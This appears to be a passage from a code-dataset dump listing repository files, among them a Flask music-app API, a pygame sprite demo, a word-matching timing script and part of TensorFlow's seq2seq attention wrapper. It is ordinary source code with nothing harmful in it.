repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
meisterluk/print-nonascii.py | printnonascii/char.py | 1 | 2308 | #!/usr/bin/env python3
class Character:
def __init__(self, c):
self.character = c
self.unicode_point = None
self.lineno = None
self.colno = None
self.category = None
self.description = None
self.line = None
def asciionly(self):
assert self.description or self.unicode_point
if self.description is not None and self.unicode_point is not None:
out = '{} {}'.format(self.unicode_point, self.description)
elif self.description:
out = '{}'.format(self.description)
elif self.unicode_point is not None:
out = '{}'.format(self.unicode_point)
if self.category is not None:
out += ' of category {}'.format(self.category)
if self.lineno is not None:
out += ' at line {}'.format(self.lineno)
elif self.colno is not None:
out += ' at column {}'.format(self.colno)
return out
@staticmethod
def make_pointer(line, colno):
out = ''
for idx in range(len(line)):
if idx == colno:
break
elif line[idx] == '\t':
out += '\t'
else:
out += '─'
return out + '⬏'
def __str__(self):
out = ''
if self.line is not None and self.colno is not None:
leading_ws = max(len(str(self.lineno)), 3)
tmpl = '{: <' + str(leading_ws) + 'd}: {}'
out += tmpl.format(self.lineno, self.line)
out += ' ' * leading_ws + ': '
out += self.make_pointer(self.line, self.colno)
out += '\n\n'
out += "{} ".format(self.character)
if self.unicode_point:
out += '{} '.format(self.unicode_point)
if self.lineno is not None and self.colno is not None:
out += '(line {}, col {})'.format(self.lineno, self.colno)
elif self.lineno is not None:
out += '(line {})'.format(self.lineno)
elif self.colno is not None:
out += '(col {})'.format(self.colno)
out += "\n"
if self.category:
out += " category: {}\n".format(self.category)
out += " name: {}\n".format(self.description)
out += "\n"
return out
| bsd-3-clause | -7,909,865,003,349,707,000 | 30.135135 | 75 | 0.503906 | false | 3.891892 | false | false | false |
building4theweb/soundem-api | soundem/views.py | 1 | 5875 | from flask import g, jsonify, request, abort
from flask_cors import cross_origin
from soundem import app
from .decorators import auth_token_required
from .models import Artist, Album, Song, User
@app.route('/api/v1/login', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def login():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
user = User.find_by_email(email)
if not user:
errors['email'] = 'User does not exist.'
elif not user.check_password(password):
errors['password'] = 'Invalid password.'
if errors:
return jsonify({'errors': errors}), 400
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data})
@app.route('/api/v1/register', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def register():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
existing_user = User.find_by_email(email)
if existing_user:
errors['email'] = 'Email is already taken'
if errors:
return jsonify({'errors': errors}), 400
user = User.create(email=email, password=password)
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data}), 201
@app.route('/api/v1/artists', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artists():
artists_results = []
for artist in Artist.get_all():
artists_results.append({
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
})
return jsonify({'artists': artists_results})
@app.route('/api/v1/artists/<int:artist_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artist(artist_id):
artist = Artist.get(artist_id)
if not artist:
abort(404)
artist_data = {
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
}
return jsonify({'artist': artist_data})
@app.route('/api/v1/albums', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_albums():
albums_results = []
for album in Album.get_all():
albums_results.append({
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
})
return jsonify({'albums': albums_results})
@app.route('/api/v1/albums/<int:album_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_album(album_id):
album = Album.get(album_id)
if not album:
abort(404)
album_data = {
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
}
return jsonify({'album': album_data})
@app.route('/api/v1/songs', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_songs():
songs_results = []
favorite = request.args.get('favorite')
song_ids = request.args.getlist('ids[]')
if favorite == 'true':
songs = Song.get_favorites(g.user)
elif song_ids:
songs = Song.filter_by_ids(song_ids)
else:
songs = Song.get_all()
for song in songs:
songs_results.append({
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': song.is_favorited(g.user),
'duration': song.duration,
'url': song.url
})
return jsonify({'songs': songs_results})
@app.route('/api/v1/songs/<int:song_id>', methods=['GET', 'PUT'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def song(song_id):
song = Song.get(song_id)
is_favorited = None
if not song:
abort(404)
if request.method == 'PUT':
data = request.get_json() or {}
data_song = data.get('song') or {}
favorite = data_song.get('favorite')
if favorite is not None:
# Update song if favorite param was sent
is_favorited = song.set_favorite(g.user, favorite)
else:
song = Song.get(song_id)
if is_favorited is None:
# Check if song was favorited
is_favorited = song.is_favorited(g.user)
song_data = {
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': is_favorited,
'duration': song.duration,
'url': song.url
}
return jsonify({'song': song_data})
@app.route('/api/v1/users/<int:user_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def user(user_id):
user = g.user
if user.id != user_id:
abort(403)
user_data = {
'id': user.id,
'email': user.email,
'songTotal': Song.total_count(),
'albumTotal': Album.total_count(),
'durationTotal': Song.total_duration()
}
return jsonify({'user': user_data})
| mit | 6,891,862,848,539,757,000 | 24.323276 | 65 | 0.584 | false | 3.459953 | false | false | false |
notkarol/banjin | experiment/python_word_matching_speed.py | 1 | 4650 | #!/usr/bin/python
# Takes in a dictionary of words
# Verifies that all functions return the same answers
# Generates random hands from the probability of getting tiles from the bunch
# Then prints out how long each function takes to find all matching words
# Generates various hand sizes to see if there's any scaling
import matplotlib.pyplot as plt
import numpy as np
import pickle
import os
import sys
import timeit
# Naive list way of matching wordbank
def f0_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i][i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if min(list(map(lambda x: x[1] - x[0], zip(wordbank[w_i], hand)))) >= 0:
results.append(w_i)
return results
# Naive way using numpy
def f0_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i,i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if not np.any((hand - wordbank[w_i]) < 0):
results.append(w_i)
return results
# A for loop and some numpy
def f2_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if np.min(hand - wordbank[w_i]) >= 0:
results.append(w_i)
return results
# Vectorized sum and difference
def f3_np(hand, wordbank):
return np.where(np.sum((wordbank - hand) > 0, axis=1) == 0)[0]
# vectorized just using any
def f4_np(hand, wordbank):
return np.where(np.any(wordbank > hand, axis=1) == 0)[0]
# Prepare a 2D list and a 2D np array of letter frequencies
with open(sys.argv[1]) as f:
words = [x.split()[0] for x in f.readlines()]
wordbank_list = [[0] * 26 for _ in range(len(words))]
wordbank_np = np.zeros((len(words), 26))
for w_i in range(len(words)):
for letter in sorted(words[w_i]):
pos = ord(letter) - 65
wordbank_list[w_i][pos] += 1
wordbank_np[w_i][pos] += 1
# Arrays for keeping track of functions and data-specific wordbanks
hand_sizes = list(range(2, 9))
functions = {'list' : [f0_list, f1_list],
'numpy': [f0_np, f1_np, f2_np, f3_np, f4_np]}
wordbanks = {'list' : wordbank_list,
'numpy': wordbank_np}
n_iter = 10 if len(sys.argv) < 3 else int(sys.argv[2])
timings = {}
for datatype in functions:
timings[datatype] = np.zeros((max(hand_sizes) + 1, n_iter, len(functions[datatype])))
# Verify that our functions give the same answers
for datatype in functions:
for func in functions[datatype]:
print(datatype, func(wordbanks[datatype][len(wordbank_list) // 2], wordbanks[datatype]))
# Time each word
imports = 'from __main__ import functions, wordbanks'
for counter in range(n_iter):
for hand_size in hand_sizes:
# Get a specific hand size
hand = [13,3,3,6,18,3,4,3,12,2,2,5,3,8,11,3,2,9,6,9,6,3,3,2,3,2]
while sum(hand) > hand_size:
pos = np.random.randint(sum(hand))
for i in range(len(hand)):
pos -= hand[i]
if pos < 0:
hand[i] -= 1
break
hand = str(hand)
# For this hand go wild
for datatype in functions:
for f_i in range(len(functions[datatype])):
cmd = 'functions["%s"][%i](%s, wordbanks["%s"])' % (datatype, f_i, hand, datatype)
timings[datatype][hand_size, counter, f_i] += timeit.timeit(cmd, imports, number=8)
print("\rCompleted %.1f%%" % (100 * (counter + 1) / n_iter), end='')
print()
# Save words and timings in case we're doing a long-lasting operation
filename = 'word_matching_timings_%s.pkl' % os.path.basename(sys.argv[1])
with open(filename, 'wb') as f:
print("Saving", filename)
pickle.dump((words, wordbanks, timings), f)
# Show Results
for datatype in functions:
means = np.mean(timings[datatype], axis=1)
for f_i in range(means.shape[1]):
plt.semilogy(hand_sizes, means[:, f_i][min(hand_sizes):], label='%s F%i' % (datatype, f_i))
plt.legend(loc='center left', bbox_to_anchor=(0.85, 0.5))
plt.xlabel("Hand Size")
plt.ylabel("Execution Time")
plt.title("Word Matching")
plt.show()
| mit | 6,223,729,968,353,600,000 | 29.794702 | 99 | 0.60043 | false | 3.144016 | false | false | false |
asweigart/pyganim | examples/sprite_sheet_demo.py | 1 | 1276 | # trex image from Wyverii on http://opengameart.org/content/unsealed-terrex
import sys
import os
sys.path.append(os.path.abspath('..'))
import pygame
from pygame.locals import *
import pyganim
pygame.init()
# set up the window
windowSurface = pygame.display.set_mode((320, 240), 0, 32)
pygame.display.set_caption('Sprite Sheet Demo')
# create the animation objects
rects = [( 0, 154, 94, 77),
( 94, 154, 94, 77),
(188, 154, 94, 77),
(282, 154, 94, 77),
(376, 154, 94, 77),
(470, 154, 94, 77),
(564, 154, 94, 77),
(658, 154, 94, 77),
(752, 154, 94, 77),]
allImages = pyganim.getImagesFromSpriteSheet('terrex_0.png', rects=rects)
frames = list(zip(allImages, [100] * len(allImages)))
dinoAnim = pyganim.PygAnimation(frames)
dinoAnim.play() # there is also a pause() and stop() method
mainClock = pygame.time.Clock()
BGCOLOR = (100, 50, 50)
while True:
windowSurface.fill(BGCOLOR)
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
dinoAnim.blit(windowSurface, (100, 50))
pygame.display.update()
mainClock.tick(30) # Feel free to experiment with any FPS setting. | bsd-3-clause | -1,025,960,563,565,159,800 | 27.377778 | 83 | 0.633229 | false | 3.097087 | false | false | false |
Xeralux/tensorflow | tensorflow/contrib/seq2seq/python/ops/attention_wrapper.py | 1 | 59833 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A powerful dynamic attention wrapper object."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import math
import numpy as np
from tensorflow.contrib.framework.python.framework import tensor_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as layers_base
from tensorflow.python.layers import core as layers_core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.util import nest
__all__ = [
"AttentionMechanism",
"AttentionWrapper",
"AttentionWrapperState",
"LuongAttention",
"BahdanauAttention",
"hardmax",
"safe_cumprod",
"monotonic_attention",
"BahdanauMonotonicAttention",
"LuongMonotonicAttention",
]
_zero_state_tensors = rnn_cell_impl._zero_state_tensors # pylint: disable=protected-access
class AttentionMechanism(object):
@property
def alignments_size(self):
raise NotImplementedError
@property
def state_size(self):
raise NotImplementedError
def _prepare_memory(memory, memory_sequence_length, check_inner_dims_defined):
"""Convert to tensor and possibly mask `memory`.
Args:
memory: `Tensor`, shaped `[batch_size, max_time, ...]`.
memory_sequence_length: `int32` `Tensor`, shaped `[batch_size]`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
Returns:
A (possibly masked), checked, new `memory`.
Raises:
ValueError: If `check_inner_dims_defined` is `True` and not
`memory.shape[2:].is_fully_defined()`.
"""
memory = nest.map_structure(
lambda m: ops.convert_to_tensor(m, name="memory"), memory)
if memory_sequence_length is not None:
memory_sequence_length = ops.convert_to_tensor(
memory_sequence_length, name="memory_sequence_length")
if check_inner_dims_defined:
def _check_dims(m):
if not m.get_shape()[2:].is_fully_defined():
raise ValueError("Expected memory %s to have fully defined inner dims, "
"but saw shape: %s" % (m.name, m.get_shape()))
nest.map_structure(_check_dims, memory)
if memory_sequence_length is None:
seq_len_mask = None
else:
seq_len_mask = array_ops.sequence_mask(
memory_sequence_length,
maxlen=array_ops.shape(nest.flatten(memory)[0])[1],
dtype=nest.flatten(memory)[0].dtype)
seq_len_batch_size = (
memory_sequence_length.shape[0].value
or array_ops.shape(memory_sequence_length)[0])
def _maybe_mask(m, seq_len_mask):
rank = m.get_shape().ndims
rank = rank if rank is not None else array_ops.rank(m)
extra_ones = array_ops.ones(rank - 2, dtype=dtypes.int32)
m_batch_size = m.shape[0].value or array_ops.shape(m)[0]
if memory_sequence_length is not None:
message = ("memory_sequence_length and memory tensor batch sizes do not "
"match.")
with ops.control_dependencies([
check_ops.assert_equal(
seq_len_batch_size, m_batch_size, message=message)]):
seq_len_mask = array_ops.reshape(
seq_len_mask,
array_ops.concat((array_ops.shape(seq_len_mask), extra_ones), 0))
return m * seq_len_mask
else:
return m
return nest.map_structure(lambda m: _maybe_mask(m, seq_len_mask), memory)
def _maybe_mask_score(score, memory_sequence_length, score_mask_value):
if memory_sequence_length is None:
return score
message = ("All values in memory_sequence_length must greater than zero.")
with ops.control_dependencies(
[check_ops.assert_positive(memory_sequence_length, message=message)]):
score_mask = array_ops.sequence_mask(
memory_sequence_length, maxlen=array_ops.shape(score)[1])
score_mask_values = score_mask_value * array_ops.ones_like(score)
return array_ops.where(score_mask, score, score_mask_values)
class _BaseAttentionMechanism(AttentionMechanism):
"""A base AttentionMechanism class providing common functionality.
Common functionality includes:
1. Storing the query and memory layers.
2. Preprocessing and storing the memory.
"""
def __init__(self,
query_layer,
memory,
probability_fn,
memory_sequence_length=None,
memory_layer=None,
check_inner_dims_defined=True,
score_mask_value=None,
name=None):
"""Construct base AttentionMechanism class.
Args:
query_layer: Callable. Instance of `tf.layers.Layer`. The layer's depth
must match the depth of `memory_layer`. If `query_layer` is not
provided, the shape of `query` must match that of `memory_layer`.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
probability_fn: A `callable`. Converts the score and previous alignments
to probabilities. Its signature should be:
`probabilities = probability_fn(score, state)`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
memory_layer: Instance of `tf.layers.Layer` (may be None). The layer's
depth must match the depth of `query_layer`.
If `memory_layer` is not provided, the shape of `memory` must match
that of `query_layer`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
name: Name to use when creating ops.
"""
if (query_layer is not None
and not isinstance(query_layer, layers_base.Layer)):
raise TypeError(
"query_layer is not a Layer: %s" % type(query_layer).__name__)
if (memory_layer is not None
and not isinstance(memory_layer, layers_base.Layer)):
raise TypeError(
"memory_layer is not a Layer: %s" % type(memory_layer).__name__)
self._query_layer = query_layer
self._memory_layer = memory_layer
self.dtype = memory_layer.dtype
if not callable(probability_fn):
raise TypeError("probability_fn must be callable, saw type: %s" %
type(probability_fn).__name__)
if score_mask_value is None:
score_mask_value = dtypes.as_dtype(
self._memory_layer.dtype).as_numpy_dtype(-np.inf)
self._probability_fn = lambda score, prev: ( # pylint:disable=g-long-lambda
probability_fn(
_maybe_mask_score(score, memory_sequence_length, score_mask_value),
prev))
with ops.name_scope(
name, "BaseAttentionMechanismInit", nest.flatten(memory)):
self._values = _prepare_memory(
memory, memory_sequence_length,
check_inner_dims_defined=check_inner_dims_defined)
self._keys = (
self.memory_layer(self._values) if self.memory_layer # pylint: disable=not-callable
else self._values)
self._batch_size = (
self._keys.shape[0].value or array_ops.shape(self._keys)[0])
self._alignments_size = (self._keys.shape[1].value or
array_ops.shape(self._keys)[1])
@property
def memory_layer(self):
return self._memory_layer
@property
def query_layer(self):
return self._query_layer
@property
def values(self):
return self._values
@property
def keys(self):
return self._keys
@property
def batch_size(self):
return self._batch_size
@property
def alignments_size(self):
return self._alignments_size
@property
def state_size(self):
return self._alignments_size
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return a tensor of all zeros.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return _zero_state_tensors(max_time, batch_size, dtype)
def initial_state(self, batch_size, dtype):
"""Creates the initial state values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return the same output as initial_alignments.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A structure of all-zero tensors with shapes as described by `state_size`.
"""
return self.initial_alignments(batch_size, dtype)
def _luong_score(query, keys, scale):
"""Implements Luong-style (multiplicative) scoring function.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, call this function with `scale=True`.
Args:
query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
scale: Whether to apply a scale to the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
Raises:
ValueError: If `key` and `query` depths do not match.
"""
depth = query.get_shape()[-1]
key_units = keys.get_shape()[-1]
if depth != key_units:
raise ValueError(
"Incompatible or unknown inner dimensions between query and keys. "
"Query (%s) has units: %s. Keys (%s) have units: %s. "
"Perhaps you need to set num_units to the keys' dimension (%s)?"
% (query, depth, keys, key_units, key_units))
dtype = query.dtype
# Reshape from [batch_size, depth] to [batch_size, 1, depth]
# for matmul.
query = array_ops.expand_dims(query, 1)
# Inner product along the query units dimension.
# matmul shapes: query is [batch_size, 1, depth] and
# keys is [batch_size, max_time, depth].
# the inner product is asked to **transpose keys' inner shape** to get a
# batched matmul on:
# [batch_size, 1, depth] . [batch_size, depth, max_time]
# resulting in an output shape of:
# [batch_size, 1, max_time].
# we then squeeze out the center singleton dimension.
score = math_ops.matmul(query, keys, transpose_b=True)
score = array_ops.squeeze(score, [1])
if scale:
# Scalar used in weight scaling
g = variable_scope.get_variable(
"attention_g", dtype=dtype, initializer=1.)
score = g * score
return score
class LuongAttention(_BaseAttentionMechanism):
"""Implements Luong-style (multiplicative) attention scoring.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, construct the object with parameter
`scale=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="LuongAttention"):
"""Construct the AttentionMechanism mechanism.
Args:
num_units: The depth of the attention mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length: (optional) Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional) The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the memory layer of the attention mechanism.
name: Name to use when creating ops.
"""
# For LuongAttention, we only transform the memory layer; thus
# num_units **must** match expected the query depth.
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(LuongAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_attention", [query]):
score = _luong_score(query, self._keys, self._scale)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
def _bahdanau_score(processed_query, keys, normalize):
"""Implements Bahdanau-style (additive) scoring function.
This attention has two forms. The first is Bhandanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, set `normalize=True`.
Args:
processed_query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
normalize: Whether to normalize the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
"""
dtype = processed_query.dtype
# Get the number of hidden units from the trailing dimension of keys
num_units = keys.shape[2].value or array_ops.shape(keys)[2]
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
processed_query = array_ops.expand_dims(processed_query, 1)
v = variable_scope.get_variable(
"attention_v", [num_units], dtype=dtype)
if normalize:
# Scalar used in weight normalization
g = variable_scope.get_variable(
"attention_g", dtype=dtype,
initializer=math.sqrt((1. / num_units)))
# Bias added prior to the nonlinearity
b = variable_scope.get_variable(
"attention_b", [num_units], dtype=dtype,
initializer=init_ops.zeros_initializer())
# normed_v = g * v / ||v||
normed_v = g * v * math_ops.rsqrt(
math_ops.reduce_sum(math_ops.square(v)))
return math_ops.reduce_sum(
normed_v * math_ops.tanh(keys + processed_query + b), [2])
else:
return math_ops.reduce_sum(v * math_ops.tanh(keys + processed_query), [2])
class BahdanauAttention(_BaseAttentionMechanism):
"""Implements Bahdanau-style (additive) attention.
This attention has two forms. The first is Bahdanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, construct the object with parameter
`normalize=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="BahdanauAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(BahdanauAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "bahdanau_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
def safe_cumprod(x, *args, **kwargs):
"""Computes cumprod of x in logspace using cumsum to avoid underflow.
The cumprod function and its gradient can result in numerical instabilities
when its argument has very small and/or zero values. As long as the argument
is all positive, we can instead compute the cumulative product as
exp(cumsum(log(x))). This function can be called identically to tf.cumprod.
Args:
x: Tensor to take the cumulative product of.
*args: Passed on to cumsum; these are identical to those in cumprod.
**kwargs: Passed on to cumsum; these are identical to those in cumprod.
Returns:
Cumulative product of x.
"""
with ops.name_scope(None, "SafeCumprod", [x]):
x = ops.convert_to_tensor(x, name="x")
tiny = np.finfo(x.dtype.as_numpy_dtype).tiny
return math_ops.exp(math_ops.cumsum(
math_ops.log(clip_ops.clip_by_value(x, tiny, 1)), *args, **kwargs))
def monotonic_attention(p_choose_i, previous_attention, mode):
"""Compute monotonic attention distribution from choosing probabilities.
Monotonic attention implies that the input sequence is processed in an
explicitly left-to-right manner when generating the output sequence. In
addition, once an input sequence element is attended to at a given output
timestep, elements occurring before it cannot be attended to at subsequent
output timesteps. This function generates attention distributions according
to these assumptions. For more information, see ``Online and Linear-Time
Attention by Enforcing Monotonic Alignments''.
Args:
p_choose_i: Probability of choosing input sequence/memory element i. Should
be of shape (batch_size, input_sequence_length), and should all be in the
range [0, 1].
previous_attention: The attention distribution from the previous output
timestep. Should be of shape (batch_size, input_sequence_length). For
the first output timestep, preevious_attention[n] should be [1, 0, 0, ...,
0] for all n in [0, ... batch_size - 1].
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'.
* 'recursive' uses tf.scan to recursively compute the distribution.
This is slowest but is exact, general, and does not suffer from
numerical instabilities.
* 'parallel' uses parallelized cumulative-sum and cumulative-product
operations to compute a closed-form solution to the recurrence
relation defining the attention distribution. This makes it more
efficient than 'recursive', but it requires numerical checks which
make the distribution non-exact. This can be a problem in particular
when input_sequence_length is long and/or p_choose_i has entries very
close to 0 or 1.
* 'hard' requires that the probabilities in p_choose_i are all either 0
or 1, and subsequently uses a more efficient and exact solution.
Returns:
A tensor of shape (batch_size, input_sequence_length) representing the
attention distributions for each sequence in the batch.
Raises:
ValueError: mode is not one of 'recursive', 'parallel', 'hard'.
"""
# Force things to be tensors
